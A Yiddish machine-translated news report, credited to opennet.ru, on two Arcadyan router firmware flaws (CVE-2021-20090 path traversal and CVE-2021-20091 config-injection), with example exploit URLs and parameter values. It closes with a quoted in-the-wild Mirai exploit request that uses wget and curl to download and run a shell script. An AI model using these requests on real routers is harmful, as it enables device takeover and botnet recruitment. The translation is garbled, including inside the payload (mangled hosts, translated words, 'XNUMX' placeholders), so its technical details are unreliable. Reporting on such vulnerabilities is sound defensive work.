וואַלנעראַביליטי אין היים ראָוטערס וואָס ווירקן 17 מאַניאַפאַקטשערערז

א מאַסיוו באַפאַלן איז רעקאָרדעד אויף די נעץ קעגן היים ראָוטערס וועמענס פירמוואַרע ניצט אַ הטטפּ סערווער ימפּלאַמענטיישאַן פון די אַרקאַדיאַן פירמע. צו באַקומען קאָנטראָל איבער דעוויסעס, אַ קאָמבינאַציע פון ​​​​צוויי וואַלנעראַביליטיז איז געניצט וואָס אַלאַוז ווייַט דורכפירונג פון אַרביטראַריש קאָד מיט וואָרצל רעכט. דער פּראָבלעם אַפעקץ אַ פערלי ברייט קייט פון ADSL ראָוטערס פון Arcadyan, ASUS און Buffalo, ווי געזונט ווי דעוויסעס סאַפּלייד אונטער די בעעלינע בראַנדז (די פּראָבלעם איז באשטעטיקט אין Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone און אנדערע טעלעקאָם אָפּערייטערז. עס איז באמערקט אַז די פּראָבלעם איז געווען פאָרשטעלן אין אַרקאַדיאַן פירמוואַרע פֿאַר מער ווי 10 יאָר און בעשאַס דעם מאָל איז געראטן צו מייגרייט צו בייַ מינדסטער 20 מיטל מאָדעלס פון 17 פאַרשידענע מאַניאַפאַקטשערערז.

דער ערשטער וואַלנעראַביליטי, CVE-2021-20090, מאכט עס מעגלעך צו אַקסעס קיין וועב צובינד שריפט אָן אָטענטאַקיישאַן. די עסאַנס פון די וואַלנעראַביליטי איז אַז אין די וועב צובינד, עטלעכע דירעקטעריז דורך וואָס בילדער, CSS טעקעס און דזשאַוואַסקריפּט סקריפּס זענען געשיקט זענען צוטריטלעך אָן אָטענטאַקיישאַן. אין דעם פאַל, דירעקטעריז פֿאַר וואָס אַקסעס אָן אָטענטאַקיישאַן איז ערלויבט זענען אָפּגעשטעלט מיט די ערשט מאַסקע. ספּעציפיצירן "../" אותיות אין פּאַטס צו גיין צו די פאָטער וועגווייַזער איז אפגעשטעלט דורך די פירמוואַרע, אָבער ניצן די "..% 2f" קאָמבינאַציע איז סקיפּט. אזוי, עס איז מעגלעך צו עפענען פּראָטעקטעד בלעטער ווען שיקט ריקוועס ווי "http://192.168.1.1/images/..%2findex.htm".

די צווייטע וואַלנעראַביליטי, CVE-2021-20091, אַלאַוז אַן אָטענטאַקייטאַד באַניצער צו מאַכן ענדערונגען צו די סיסטעם סעטטינגס פון די מיטל דורך שיקן ספּעציעל פאָרמאַטטעד פּאַראַמעטערס צו די application_abstract.cgi שריפט, וואָס קען נישט קאָנטראָלירן די בייַזייַן פון אַ נייַ-לינע כאַראַקטער אין די פּאַראַמעטערס. . פֿאַר בייַשפּיל, ווען פּערפאָרמינג אַ פּינג אָפּעראַציע, אַ אַטאַקער קענען ספּעציפיצירן די ווערט "192.168.1.2% 0AARC_SYS_TelnetdEnable = 1" אין דעם פעלד מיט די IP אַדרעס וואָס איז אָפּגעשטעלט, און די שריפט, ווען קריייטינג די סעטטינגס טעקע /tmp/etc/config/ .glbcfg, וועט שרייַבן די שורה "AARC_SYS_TelnetdEnable=1" אין עס ", וואָס אַקטאַווייץ די טעלנעטד סערווער, וואָס גיט אַנריסטריקטיד באַפֿעלן שאָל אַקסעס מיט וואָרצל רעכט. סימילאַרלי, דורך באַשטעטיקן די AARC_SYS פּאַראַמעטער, איר קענען ויספירן קיין קאָד אויף די סיסטעם. דער ערשטער וואַלנעראַביליטי מאכט עס מעגלעך צו לויפן אַ פּראָבלעמאַטיק שריפט אָן אָטענטאַקיישאַן דורך אַקסעס עס ווי "/images/..%2fapply_abstract.cgi".

צו גווורע וואַלנעראַביליטיז, אַ אַטאַקער מוזן קענען צו שיקן אַ בקשה צו די נעץ פּאָרט אויף וואָס די וועב צובינד איז פליסנדיק. אויב משפטן לויט די דינאַמיק פון די פאַרשפּרייטן פון די באַפאַלן, פילע אָפּערייטערז לאָזן אַקסעס אויף זייער דעוויסעס פֿון די פונדרויסנדיק נעץ צו פאַרפּאָשעטערן די דיאַגנאָסיס פון פּראָבלעמס דורך די שטיצן דינסט. אויב אַקסעס צו די צובינד איז לימיטעד בלויז צו די ינערלעך נעץ, אַ באַפאַלן קענען זיין דורכגעקאָכט פֿון אַ פונדרויסנדיק נעץ מיט די "דנס ריבינדינג" טעכניק. וואַלנעראַביליטיז זענען שוין אַקטיוולי געניצט צו פאַרבינדן ראָוטערס צו די Mirai botnet: POST /images/..%2fapply_abstract.cgi הטטפּ/1.1 קאַנעקשאַן: נאָענט באַניצער-אַגענט: דאַרק action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; קערל+-אָ+הטטפּ://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

מקור: opennet.ru